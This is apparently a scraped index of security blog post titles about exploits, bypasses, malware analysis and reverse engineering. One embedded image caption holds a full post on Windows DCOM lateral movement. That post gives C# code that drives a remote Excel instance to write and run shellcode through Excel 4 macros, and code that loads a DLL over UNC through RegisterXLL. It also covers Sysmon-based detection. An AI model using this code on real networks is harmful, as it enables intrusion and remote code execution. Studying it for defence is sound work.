- Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991
- CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) unauthenticated RCE
- Barracuda Email Security Gateway Appliance (ESG) Vulnerability
- HARDWARE HACKING 101: IDENTIFYING AND DUMPING EMMC FLASH
- EMMC DATA RECOVERY FROM DAMAGED SMARTPHONE
- RED VS. BLUE: KERBEROS TICKET TIMES, CHECKSUMS, AND YOU!
- Pwn the ESP32 Secure Boot
- [Case study] Decrypt strings using Dumpulator
![[Case study] Decrypt strings using Dumpulator](https://i0.wp.com/movaxbx.ru/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-03.40.01.png?fit=300%2C126&ssl=1)
- How we broke PHP, hacked Pornhub and earned $20,000
- Introducing RPC Investigator
- Patch Tuesday -> Exploit Wednesday: Pwning Windows Ancillary Function Driver for WinSock (afd.sys) in 24 Hours
- Exploiting CVE-2023-23397: Microsoft Outlook Elevation of Privilege Vulnerability
- Gitpod remote code execution 0-day vulnerability via WebSockets
- BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11
- Reverse Engineering Yaesu FT-70D Firmware Encryption
- Bypassing Okta MFA Credential Provider for Windows
- Unusual 403 Bypass to a full website takeover [External Pentest]
![Unusual 403 Bypass to a full website takeover [External Pentest]](https://i0.wp.com/movaxbx.ru/wp-content/uploads/2023/02/10pB1DUgQp9HIuzAIeS63uA-1.webp?fit=300%2C136&ssl=1)
- EXPLOITING A REMOTE HEAP OVERFLOW WITH A CUSTOM TCP STACK
- GHSL-2022-059_GHSL-2022-060: SQL injection vulnerabilities in Owncloud Android app — CVE-2023-24804, CVE-2023-23948
- Asus RT-AX82U vulnerability
- Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day).
- [BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB
![[BugTales] REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB](https://i0.wp.com/movaxbx.ru/wp-content/uploads/2023/02/Снимок-экрана-2023-02-17-в-00.39.52.jpg?fit=300%2C159&ssl=1)
- How I hacked into a Telecom Network — Part 1 (Getting the RCE)
- Hacking Some More Secure USB Flash Drives (Part II)
- Hacking Some More Secure USB Flash Drives (Part I)
- Turning Google smart speakers into wiretaps for $100k
- Dompdf vulnerable to URI validation failure on SVG parsing
- ImageMagick: The hidden vulnerability behind your online images
- Exploiting null-dereferences in the Linux kernel
- Exploiting CVE-2022-42703 — Bringing back the stack attack
- How a CPU works: Bare metal C on my RISC-V toy CPU
- Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg
- CVE-2023-24068 && CVE-2023-24069: Abusing Signal Desktop Client for fun and for Espionage
- ManageEngine CVE-2022-47966 Technical Deep Dive
- Exploiting CVE-2021-3490 for Container Escapes
- Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router
- Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
- Android: Exploring vulnerabilities in WebResourceResponse
- Popular JWT cloud security library patches “remote” code execution hole
- Remote code execution bug discovered in the popular JsonWebToken library
- Malware-based attacks on ATMs – A summary
- FHRP Nightmare. Pentesting redundancy systems like a devil.
- Exploiting Flipper Zero’s NFC file loader
- CVE-2022-36923 ManageEngine OpManager getUserAPIKey Authentication Bypass
- Zyxel addressed a critical RCE flaw in its NAS devices
- New Linux malware evades detection using multi-stage deployment
- A blueprint for evading industry leading endpoint protection in 2022
- Walmart Sells Fake 30TB Hard Drive That’s Actually Two Small SD Cards in a Trench Coat
- Shell Code Injector with AES Encryption — EDR Bypass
- On the recent vulnerability in Diebold Nixdorf ATMs
- A Peek into Top-Level Domains and Cybercrime
- Practical HTTP Header Smuggling: Sneaking Past Reverse Proxies to Attack AWS and Beyond
- Summer of FPGAs — Lattice MACHXO3LF Starter Kit — Review
- Finding SSRF via HTML Injection inside a PDF file on AWS EC2
- Automating Migration AWS EC2 Instance Metadata Service (IMDSv2) using Ansible
- Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2)
- Getting shell and data access in AWS by chaining vulnerabilities
- An SSRF, privileged AWS keys and the Capital One breach
- Blue Klotski (CVE-2021-3573) and the story for fixing
- Bindiff and POC for the IOMFB vulnerability, iOS 15.0.2
- PHP 7.0-8.0 disable_functions bypass PoC (nix only)
- Director Yermoshin, who was detained by mistake of the face recognition system, wrote a complaint
- CallbackHell
- WinRAR’s vulnerable trialware: when free software isn’t free
- Microsoft asks admins to patch PowerShell to fix WDAC bypass
- Exploiting Redis Through SSRF Attack
- New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks
- Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC
- Understanding How Facebook Disappeared from the Internet
- New Windows 11 install script bypasses TPM, system requirements
- Say Cheese: Ransomware-ing a DSLR Camera
- Analysis of Satisfyer Toys: Discovering an Authentication Bypass with r2 and Frida
- Disclosure of three 0-day iOS vulnerabilities and critique of Apple Security Bounty program
- A New Bug in Microsoft Windows Could Let Hackers Easily Install a Rootkit
- 10 Most Common Security Issues Found in Login Functionalities
- New macOS zero-day bug lets attackers run commands remotely
- Unicode for Security Professionals
- New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits
- [BugTales] Da Vinci Hits a Nerve: Exploiting Huawei’s NPU Driver
![[BugTales] Da Vinci Hits a Nerve: Exploiting Huawei’s NPU Driver](https://i0.wp.com/movaxbx.ru/wp-content/uploads/2021/08/Снимок-экрана-2021-08-02-в-01.03.53.png?fit=300%2C219&ssl=1)
- Named Pipe Pass-the-Hash
- HEVD: kASLR + SMEP Bypass
- Reverse Engineering the M6 Smart Fitness Bracelet
- EXPLOITING LESS.JS TO ACHIEVE RCE
- Kaspersky Password Manager: All your passwords are belong to us
- A supply-chain breach: Taking over an Atlassian account
- Bypassing SSL pinning on Android Flutter Apps with Ghidra
- VMProtect 2 — Part Two, Complete Static Analysis
- CVE-2021-22909- DIGGING INTO A UBIQUITI FIRMWARE UPDATE BUG
- M1ssing Register Access Controls Leak EL0 State
- My RCE PoC walkthrough for (CVE-2021–21974) VMware ESXi OpenSLP heap-overflow vulnerability
- VMProtect 2 — Detailed Analysis of the Virtual Machine Architecture
- Portable Data exFiltration: XSS for PDFs
- Weird Ways to Run Unmanaged Code in .NET
- CVE-2021-1647: Windows Defender mpengine remote code execution
- Compiling C without webassembly
- Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild
- Process Herpaderping
- Speculating The Entire X86-64 Instruction Set In Seconds With This One Weird Trick
- TikTok for Android 1-Click RCE
- New Old Bugs in the Linux Kernel
- CVE-2021-27927: CSRF to RCE Chain in Zabbix
- How to get root on Ubuntu 20.04 by pretending nobody’s /home
- One day short of a full chain: Part 1 — Android Kernel arbitrary code execution
- SSRF: Bypassing hostname restrictions with fuzzing
- Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities
- WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK
- I Like to Move It: Windows Lateral Movement Part 2 – DCOM
![Overview In part 1 of this series, we discussed lateral movement using WMI event subscriptions. During this post we will discuss another of my “go to” techniques for lateral movement, using the Distributed Component Object Model (DCOM). I won’t dwell on this too long as DCOM is covered in many other research posts, but let’s cover a brief introduction to what DCOM is and why it is interesting. COM is a component of Windows that facilitates interoperability between software, DCOM extends this across the network using remote procedure calls (RPC). Software hosting a COM server (typically within a DLL or exe) on a remote system is therefore able to expose its methods to clients using RPC. One of the benefits for leveraging DCOM for lateral movement is that the process executing on the remote host is whatever software is hosting the COM server. For example, if abusing the ShellBrowserWindow COM object, execution will occur in an existing explorer.exe process on the remote host. From an offensive perspective, this has not only the obvious benefits of helping to blend in but also due to the significant number of programs exposing methods to DCOM it can be difficult to comprehensively monitor them all for execution. Discovering DCOM Methods If we are interested in discovering applications that support DCOM, we can use the Win32_DCOMApplication WMI class to list them: Using this list, we can instantiate each AppID and list the available methods using the Get-Member cmdlet: In this example, we can see the exposed methods for the ShellBrowserWindow COM object; one of the well known methods for lateral movement is Document.Application.ShellExecute which resides within this object. Case Study with Excel When I first started this research, my original objective was to try and discover a new COM object that could be used for lateral movement over DCOM. Unfortunately, in the limited time I had my search was fairly unfruitful, so instead I’m going to document a couple of my favourite techniques for lateral movement to workstations using Excel. By creating an instance of the Excel COM class you will discover there are many methods available: Reviewing these methods, you can find at least two methods that are known to be capable of lateral movement; ExecuteExcel4Macro and RegisterXLL. Let’s walkthrough how we can develop tooling to leverage these methods for lateral movement using C#. Lateral Movement Using ExecuteExcel4Macro This technique was first documented by Stan Hegt from Outflank and allows Excel4 macros to be executed remotely. The main benefits of this method is that XLM macros are still not widely supported across anti-virus engines and the technique can be executed in a fileless manner inside the DCOM launched excel.exe process. This approach therefore allows the operator to minimise the indicators associated with the technique and reduce the likelihood of detection. Firstly, an instance of the Excel COM object needs to be instantiated to facilitate executing its methods; previously we showed how to do this in PowerShell, the equivalent C# is as follows: Type ComType = Type.GetTypeFromProgID("Excel.Application", REMOTE_HOST); object excel = Activator.CreateInstance(ComType); At this point, we’re in a position to start calling the XLM code using InvokeMember to execute the instance’s ExecuteExcel4Macro method, where the following can be used to pop calc: excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "EXEC(\\"calc.exe\\")" }); In order to weaponise this technique, we ideally want it to execute in a fileless manner. As explained by Outflank, XLM code has direct access to the Win32 API so we can leverage this to execute shellcode by writing it to memory and starting a new thread: var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" })); var startaddr = memaddr; foreach (var b in shellcode) { var cb = String.Format("CHAR({0})", b); var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)"; excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode }); memaddr++; } excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" }); This of course can be improved to do remote process injection or speed up execution by moving the bytes in chunks. Lateral Movement Using RegisterXLL The second of my favoured lateral movement approaches using Excel is the RegisterXLL method, first documented by Ryan Hanson. This approach is relatively straightforward and as the name implies, the RegisterXLL method allows you to execute an XLL file. This file is simply an DLL with the xlAutoOpen export. However, the beauty of this technique is twofold, the extension for the file is irrelevant and the method accepts a UNC path, meaning that it does not need to be hosted on the system you are laterally moving to. Creating tooling for this technique is a simple one, and in a few short lines we’re able to create an instance of the Excel COM object and invoke the RegisterXLL method which takes a single argument, the path to the XLL file: string XLLPath = "\\\\\\\\fileserver\\\\excel.log"; Type ComType = Type.GetTypeFromProgID("Excel.Application", REMOTE_HOST); object excel = Activator.CreateInstance(ComType); excel.GetType().InvokeMember("RegisterXLL", BindingFlags.InvokeMethod, null, excel, new object[] { XLLPath }); Let’s take a look at this technique in action: Detection Detection for DCOM lateral movement techniques can be complex, however generally speaking it is possible to detect that a process has been instantiated through DCOM as it will be executed through the DCOMLaunch service or with DllHost.exe as a parent process. These can be captured using Sysmon Process Create events (ID 1) such as the following: You will also note the presence of the “/automation -Embedding” arguments used by Excel in this instance which are also a further indicator that the process has been launched through automation. Although specific to the RegisterXLL technique, it may also be worthwhile monitoring for ImageLoad events (ID 7) where the image is an XLL file: Detecting the ExecuteExcel4Macro technique is somewhat more complex as the macro code executes in-process and does not necessarily require additional image loads or similar. The Mordor dataset is now available for this courtesy of @Cyb3rWard0g: DCOM RegisterXLL DCOM ExecuteExcel4Macro Stay tuned for part 3…. This post was written by Dominic Chell.](https://i0.wp.com/movaxbx.ru/wp-content/uploads/2021/03/Снимок-экрана-2021-03-03-в-13.25.07.png?fit=300%2C111&ssl=1)
- How I Might Have Hacked Any Microsoft Account
- Story Behind Sweet SSRF.
- The Secret Parameter, LFR, and Potential RCE in NodeJS Apps
- Exploiting CVE-2014-3153 (Towelroot)
- FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities
- NTFS Remote Code Execution (CVE-2020-17096) Analysis
- Speeding up Linux disk encryption
- Oh, so you have an antivirus… name every bug
- Dumping LAPS Passwords from Linux
- How I hacked Facebook: Part One
- Threat Actor: Unkown
- Escalating XSS to Account Takeover
- Weaponizing XSS For Fun & Profit
- Burp Suite vs OWASP ZAP – a Comparison series
- Genetic Analysis of CryptoWall Ransomware
- Coldcard isolation bypass
- AMD laptops have a hidden 10-second performance delay. Here’s why
- Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!
- The Powerful HTTP Request Smuggling
- Deep Dive Into Nmap Scan Techniques
- Exploring the Exploitability of “Bad Neighbor”: The Recent ICMPv6 Vulnerability (CVE-2020-16898)
- Preparation toward running Docker on ARM Mac: Building multi-arch images with Docker BuildX
- How to get root on Ubuntu 20.04 by pretending nobody’s /home
- Babax stealer rebrands to Osno, installs rootkit
- Bypass AMSI in PowerShell
- How I found a Tor vulnerability in Brave Browser, reported it, watched it get patched, got a CVE (CVE-2020-8276) and a small bounty, all in one working day
- Attack of the clones: Git clients remote code execution
- Взлом и защита
- Stealing macOS apps’ Keychain entries
- Exploring an Assembly Loading Technique and Detection Mechanism for the GfxDownloadWrapper.exe LOLBIN
- Android Security Testing: Setting up burp suite with Android VM/physical device
- Running JXA Payloads from macOS Office Macros
- Code execution via the Windows Update client (wuauclt)
- Plug’nPwn — Connect to Jailbreak
- CVE-2020-12928 Exploit Proof-of-Concept, Privilege Escalation in AMD Ryzen Master AMDRyzenMasterDriver.sys
- CVE-2020-14386: Privilege Escalation Vulnerability in the Linux kernel
- Salesforce Lightning — An in-depth look at exploitation vectors for the everyday community
- A Deep Dive Into RUNDLL32.EXE
- Reverse Engineering Go Binaries with Ghidra
- Extracting kernel stack function arguments from Linux x86-64 kernel crash dumps
- Mutation XSS via namespace confusion – DOMPurify < 2.0.17 bypass
- Espressif ESP32: Bypassing Encrypted Secure Boot (CVE-2020-13629)
- Arbitrary code execution on Facebook for Android through download feature
- uTorrent CVE-2020-8437 Vulnerability And Exploit Overview
- #Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS
- Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing
- XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization
- How to contact Google SRE: Dropping a shell in cloud SQL
- CVE-2020–9934: Bypassing the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data
- Stack Based Buffer Overflows on x64 (Windows)
- Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection
- InQL – A Burp Extension For GraphQL Security Testing
- Microsoft Windows LNK Remote Code Execution Vulnerability — CVE-2020-1299
- Exploring search connectors and library files in Windows
- Public password dumps in ELK
- Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
- Identifying Clear Text LDAP binds to your DC’s
- Abusing SeLoadDriverPrivilege for privilege escalation
- Remapping Python Opcodes
- Туда-обратная разработка. Веселее, чем б*тпл*г, полезнее, чем STM
- Analyzing WhatsApp Calls with Wireshark, radare2 and Frida
- Millions’ of Cisco devices vulnerable to CDPwn flaws
- Finding and exploiting CVE-2018–7445 (unauthenticated RCE in MikroTik’s RouterOS SMB)
- Case Study : Exploiting a Business Logic Flaw with GitHub’s Forgot Password workflow (discovered by John Gracey)
- Pwning VMWare, Part 1: RWCTF 2018 Station-Escape
- No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA
- From dropbox(updater) to NT AUTHORITY\SYSTEM
- From 0 to 0day — quick fuzzing lesson
- Javascript Anti Debugging — Some Next Level Sh*t (Part 1 — Abusing SourceMappingURL)
- AMSI Bypass With a Null Character
- PHISHING USERS USING EVILGINX AND BYPASSING 2FA
- Windows Process Injection : Windows Notification Facility
- Debug UEFI code by single-stepping your Coffee Lake-S hardware CPU
- Unpatched Bug Let Attackers Bypass Windows Lock Screen On RDP Sessions
- How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code
- Fuzzing the MSXML6 library with WinAFL
- RDP Event Log DFIR
- How the $LogFile works?
- CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
- TP-Link ‘smart’ router proves to be anything but smart – just like its maker: Zero-day vuln dropped after silence
- Researchers discover and abuse new undocumented feature in Intel chipsets
- Insomni’Hack 2019 CTF – Perfectly Unbreakable Flag – 500
- Setting up Frida Without Jailbreak on devices running Latest iOS 12.1.4
- Extracting a 19 Year Old Code Execution from WinRAR
- MikroTik Firewall & NAT Bypass Exploitation from WAN to LAN
- CVE-2018-20250: WinRAR Vulnerability Found after 19 Years of Possible Exploitation
- Triaging the exploitability of IE/EDGE crashes
- Hacking Jenkins Part 2 — Abusing Meta Programming for Unauthenticated RCE!
- “Relaying” Kerberos — Having fun with unconstrained delegation
- Bypass EDR’s memory protection, introduction to hooking
- ROP-ing on Aarch64 — The CTF Style
- NTFS Case Sensitivity on Windows
- ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA
- Achieving remote code execution on a Chinese IP camera
- Pentesting Webservices with Net.TCP Binding
- Windows Process Injection: Sharing the payload
- Siemens Warns of Critical Remote-Code Execution ICS Flaw
- Windows Internals
- Make It Rain with MikroTik
- SensorsTechForum NEWSTHREAT REMOVALREVIEWSFORUMSSEARCH NEWS CVE-2019-5736 Linux Flaw in runC Allows Unauthorized Root Access
- Privilege Escalation in Ubuntu Linux (dirty_sock exploit)
- Malicious use of Microsoft LAPS
- Yes, More Callbacks — The Kernel Extension Mechanism
- Script to Create an Overview and Full Report of all Group Objects in a Domain
- Abusing Mount Points over the SMB Protocol
- X Forwarded for SQL injection
- Running Code From A Non-Elevated Account At Any Time
- VirtualProtectEx to bypass ASLR : A specific case study
- Round of use Winrm code execution XML
- Modlishka — An Open Source Phishing Tool With 2FA Authentication
- Insomni’Hack Teaser 2019 — exploit-space
- 10 Evil User Tricks for Bypassing Anti-Virus
- From MSSQL to RCE
- Userland API Monitoring and Code Injection Detection
- How to find open databases with the help of Shodan and Lampyre
- RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation
- Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes)
- RPC Bug Hunting Case Studies
- Active Directory as Code
- SharpNado — Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads
- Injecting Code into Windows Protected Processes using COM — Part 2
- Injecting Code into Windows Protected Processes using COM — Part 1
- Tampering with Windows Event Tracing: Background, Offense, and Defense
- Real-Time Sysmon Processing via KSQL and HELK — Part 1: Initial Integration
- How To Exploit PHP Remotely To Bypass Filters & WAF Rules
- Deobfuscating Emotet’s powershell payload
- Execute assembly via Meterpreter session
- Bypassing Kaspersky Endpoint Security 11
- Natural Language Processing: Measuring Semantic Relatedness
- Microsoft unveils Windows Sandbox: Run any app in a disposable virtual machine
- Publicly accessible .ENV files
- Unpacking Grey Energy malware (Service Application DLL)
- Hypervisor From Scratch – Part 5: Setting up VMCS & Running Guest Code
- Hypervisor From Scratch – Part 4: Address Translation Using Extended Page Table (EPT)
- Hypervisor From Scratch – Part 3: Setting up Our First Virtual Machine
- Hypervisor From Scratch – Part 2: Entering VMX Operation
- Hypervisor From Scratch – Part 1: Basic Concepts & Configure Testing Environment
- Acoustic Audio Patterns Could Be Giving Away Your Passwords, Learned by Neural Nets
- Kerberoasting — From setup to cracking
- TUTORIAL – UNIVERSAL ANDROID SSL PINNING IN 10 MINUTES WITH FRIDA
- AMSI Bypass: Patching Technique
- Trivial Anti-BlueTeam trick for 32-bit systems
- Intro to NFC Payment Relay Attacks
- Ransomware Infects 100K PCs in China, Demands WeChat Payment
- A look under the hood of a decentralised VPN Application.
- DIRECTX TO THE KERNEL
- Quickpost: Compiling with Build Tools for Visual Studio 2017
- Dissecting a Bug in the EternalBlue Client for Windows XP (FuzzBunch)
- Yet another memory leak in ImageMagick or how to exploit CVE-2018–16323.
- Extracting SSH Private Keys from Windows 10 ssh-agent
- A new exploit for zero-day vulnerability CVE-2018-8589
- Cryptocurrency Mining Malware uses Various Evasion Techniques, Including Windows Installer, as Part of its Routine
- Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data
- Password Hashes — How They Work, How They’re Hacked, and How to Maximize Security
- CVE-2018-9539: Use-after-free vulnerability in privileged Android service
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN
- In-Memory Evasion
- Running PowerShell on Azure VMs at Scale
- Microsoft Windows win32k.sys — Invalid Pointer Vulnerability (MSRC Case 48212)
- PolySwarm Smart Contract Hacking Challenge Writeup
- HTTPS Payload and C2 Redirectors
- Analysis of Linux.Omni
- Roasting AS-REPs
- Debugging UCSI firmware failures
- BlobRunner — Quickly Debug Shellcode Extracted During Malware Analysis
- GPU side channel attacks can enable spying on web activity, password stealing
- Insecure Firmware Updates in Server Management Systems
- Phishing tales: Microsoft Access Macro (.MAM) shortcuts
- Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
- Virtualbox e1000 0day
- PS4: Fail0verflow disclose an exploit that could work on “all currently released hardware and software versions of PS4”
- FaceTime: Heap Corruption in RTP Video Processing
- Tearing apart printf()
- Embedding Meterpreter in Android APK
- Linux Buffer Overflows x86 – Part 3 (Shellcoding)
- Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)
- Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)
- Reverse shell on AIX 7.2
- Passing the hash with native RDP client (mstsc.exe)
- 5 Ways to Find Systems Running Domain Admin Processes
- From SQLi to Domain Admin
- XSS Polyglot Challenge v2
- Evernote For Windows Read Local File and Command Execute Vulnerabilities
- Alternative methods of becoming SYSTEM
- PDFiD: GoToE and GoToR Detection (“NTLM Credential Theft”)
- NTLM Credentials Theft via PDF Files
- Network access: Restrict clients allowed to make remote calls to SAM
- Domain hacks with unusual Unicode characters
- AWS Privilege Escalation Vulnerabilities
- children tcache which is one NULL byte buffer overflow on the heap
- zero-day RCE crafted from a tricky XXE, affecting millions of users on NetGear Stora, SeaGate Home, & Medion LifeCloud NAS
- CVE-2018-5407 (Flaw in the Intel processor execution engine sharing on SMT (e.g. Hyper-Threading) architectures.) POC ,
- Microsoft Releases First Sysinternals Tool for Linux, More on the Way
- firefox.profile.i2p
- An anti-sandbox/anti-reversing trick using the GetClipboardOwner API
- WoW64 internals …re-discovering Heaven’s Gate on ARM
- AmsiScanBuffer Bypass — Part 3
- AmsiScanBuffer Bypass — Part 2
- AmsiScanBuffer Bypass — Part 1
- Beginners Guide To x86 Shellcoding on FreeBSD
- Project Dribble: hacking Wi-Fi with cached JavaScript
- Malware on Steroids Part 3: Machine Learning & Sandbox Evasion
- Unofficial opensource place-and-route for Xilinx Coolrunner-II CPLDs
- A Guide to ARM64 / AArch64 Assembly on Linux with Shellcodes and Cryptography
- Google’s reCAPTCHA v3 Promises No Break For Bot Checking
- Google Home (in)Security
- How to exploit OpenBSD using Twitter images as payload for exploit delivery, social media as a filesystem
- Java Deserialization — From Discovery to Reverse Shell on Limited Environments
- ETHEREUM SMART CONTRACT DECOMPILER
- List of Awesome Red Teaming Resources
- RemoteRecon
- CVE-2018-9411: New critical vulnerability in multiple high-privileged Android services
- Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)
- Interesting technique to inject malicious code into svchost.exe
- Apple T2 security chip on new Macbook prevents software from using the mic to eavesdrop
- Persistent GCP backdoors with Google’s Cloud Shell
- Brief reverse engineering work on FIMI A3
- Building the rCrumbl the Ultimate RaspberryPi Phone
- Microsoft Sandboxes Windows Defender
- Library to reflectively load a driver and bypass Windows Driver signing enforcement .
- C++ Core Guidelines: Definition of Concepts, the Second
- Exploring PowerShell AMSI and Logging Evasion
- SharpCradle — Loading remote C# binaries and executing them in memory
- PE-sieve is a light-weight tool that helps to detect malware running on the system
- Linux Privilege Escalation via Automated Script
- How to bypass AMSI and execute ANY malicious Powershell code
- Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV
- .NET payloads in Windows Notification Facility (WNF) state names using low-level Windows Kernel API calls.
- VMware virtual disk (VMDK) in Multi Write Mode
- Patching nVidia GPU driver for hot-unplug on Linux
- Comparison between Enhanced Mitigation Experience Toolkit and Windows Defender Exploit Guard
- Technical Rundown of WebExec
- R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On For Windows 10 Systems
- Visual Studio 2019
- Reversing ESP8266 Firmware (Part 6)
- Reversing ESP8266 Firmware (Part 5)
- Reversing ESP8266 Firmware (Part 4)
- Reversing ESP8266 Firmware (Part 3)
- Reversing ESP8266 Firmware (Part 2)
- Reversing ESP8266 Firmware (Part 1)
- Control Register Access Exiting and Crashing VMware
- Easily create SSH tunnels.
- A SECURITY ANALYSIS TOOLKIT FOR PROPRIETARY CAR PROTOCOLS CANALYZAT0R
- Injecting .Net Assemblies Into Unmanaged Processes
- Undetectable C# & C++ Reverse Shells
- Windows oneliners to download remote payload and execute arbitrary code
- Intel Virtualisation: How VT-x, KVM and QEMU Work Together
- Super-Stealthy Droppers
- Available Artifacts — Evidence of Execution
- Hooking Linux Kernel Functions, how to Hook Functions with Ftrace
- AppSec Ezine — 243rd Edition
- Blanket is a sandbox escape targeting iOS 11.2.6
- Project: x86-devirt
- Serious bug, Array state will be cached in iOS 12 Safari.
- Linux Privilege Escalation
- Let’s write a Kernel with keyboard and screen support
- Let’s write a Kernel
- Analyzing the iOS 12 kernelcache’s tagged pointers
- Privilege Escalation & Post-Exploitation
- Zero Day Zen Garden: Windows Exploit Development — Part 5 [Return Oriented Programming Chains]
- OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
- Insecure Firmware Updates in Server Management Systems
- Windows Processes
- Bypass Data Execution Protection (DEP)
- What are some fun C++ tricks
- Old but still C++ Tricks
- Build a blockchain with C++
- Bypassing CSP using polyglot JPEGs
- Radare2 2.6.9 (salty peas) has been relesaed!
- Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1
- Aigo Chinese encrypted HDD − Part 1: taking it apart
- Practical Reverse Engineering Part 5 — Digging Through the Firmware
- Practical Reverse Engineering Part 4 — Dumping the Flash
- Practical Reverse Engineering Part 3 — Following the Data
- Practical Reverse Engineering Part 2 — Scouting the Firmware
- Practical Reverse Engineering Part 1 — Hunting for Debug Ports
- phpMyAdmin 4.8.x LFI to RCE (Authorization Required)
- OpenBSD Kernel Internals — Creation of process from user-space to kernel space.
- PoC for Android Bluetooth bug CVE-2018-9355
- Open-sourcing Katran, a scalable network load balancer (Facebook libs)
- Как программировать Arduino на ассемблере
- AVR(Arduino) Firmware Duplicator
- Ocularis Recorder VMS_VA Denial of Service Vulnerability
- Save and Reborn GDI data-only attack from Win32k TypeIsolation
- New code injection trick named — PROPagate code injection technique
- PE-sieve — Hook Finder is open source tool based on libpeconv.
- Iron Group’s Malware using HackingTeam’s Leaked RCS source code with VMProtected Installer — Technical Analysis
- Misusing debugfs for In-Memory RCE
- ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages
- Linux Privilege Escalation Using PATH Variable
- PowerShell: In-Memory Injection Using CertUtil.exe
- Remote Code Execution Vulnerability in the Steam Client
- Data Exfiltration via Formula Injection
- Extracting SSH Private Keys from Windows 10 ssh-agent
- CONTROL FLOW DEOBFUSCATION VIA ABSTRACT INTERPRETATION
- Defeating HyperUnpackMe2 With an IDA Processor Module
- Create all God Modes with a click in Windows 10/8/7
- RCE in Adobe Acrobat, describes the buffer overflow and shows how the researcher bypassed the original patch in a couple of hours.
- Run PowerShell with rundll32. Bypass software restrictions.
- Malicious Macro Generator Utility
- EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
- Researchers Defeat AMD’s SEV Virtual Machine Encryption
- Loading Kernel Shellcode
- Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels
- CVE-2017–11882 RTF — Full description
- Reverse Engineering With Radare2 – Part 3
- Reverse Engineering With Radare2 – Part 2
- Reverse Engineering With Radare2 – Part 1
- Reverse Engineering With Radare2 – Intro
- A bunch of Red Pills: VMware Escapes
- Reverse Engineering x64 for Beginners – Linux
- Reverse Engineering x64 for Beginners – Windows
- Running system commands through Nvidia signed binaries
- Reverse Engineering Advanced Programming Concepts
- AES-128 Block Cipher
- Kernel hacking tool – XueTR/PCHunter
- Retargetable Machine-Code Decompiler: RetDec
- Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege
- Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read
- Reverse Engineering Basic Programming Concepts
- Conditional instructions in the ARM1 processor, reverse engineered
- Reverse engineering the ARM1, ancestor of the iPhone’s processor
- AMD ARM Reading privileged memory with a side-channel
- ARM Reverse Engineering – Hacking Double Variables
- Take full control of online compilers through a common exploit
- Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en
- Bypassing Android Anti-Emulation
- From git clone to Pwned — Owning Windows with DoublePulsar and EternalBlue
- AMD Gaming Evolved exploiting
- In-Memory-Only ELF Execution (Without tmpfs)
